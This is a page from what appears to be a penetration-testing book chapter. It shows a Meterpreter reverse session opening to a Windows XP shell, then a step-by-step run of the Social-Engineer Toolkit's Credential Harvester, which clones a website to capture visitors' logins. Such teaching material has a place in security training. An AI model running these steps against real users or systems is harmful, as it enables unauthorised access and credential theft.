background image

148

Chapter 10

msf exploit(handler) > 
[*] Sending stage (748032 bytes) to 10.10.1.102
[*] Meterpreter session 1 opened (10.10.1.112:443 -> 10.10.1.102:58412)

msf exploit(handler) > 

sessions -i 1

[*] Starting interaction with 1...

shellmeterpreter > 

shell

Process 2819 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator\Desktop>

Username and Password Harvesting

In the preceding examples, the goal was to obtain access to the individual sys-
tem. Relatively new within SET is the ability to clone a website and harvest vis-
itors’ credentials when they access the site, as we’ll demonstrate using Gmail 
in this next example. SET can create a clone of the Gmail website and then 
automatically rewrite the POST parameters of that website to post to the 
SET web server and then redirect the user to the legitimately cloned website.

 3. Credential Harvester Attack Method

Enter your choice (press enter for default): 

3

[!] Website Attack Vectors [!]

 2. Site Cloner

Enter number (1-4): 

2

Email harvester will allow you to utilize the clone capabilities within SET
to harvest credentials or parameters from a website as well as place them into 
a report.

SET supports both HTTP and HTTPS
Example: http://www.thisisafakesite.com

 Enter the url to clone: 

http://www.secmaniac.com

Press {return} to continue.
[*] Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below: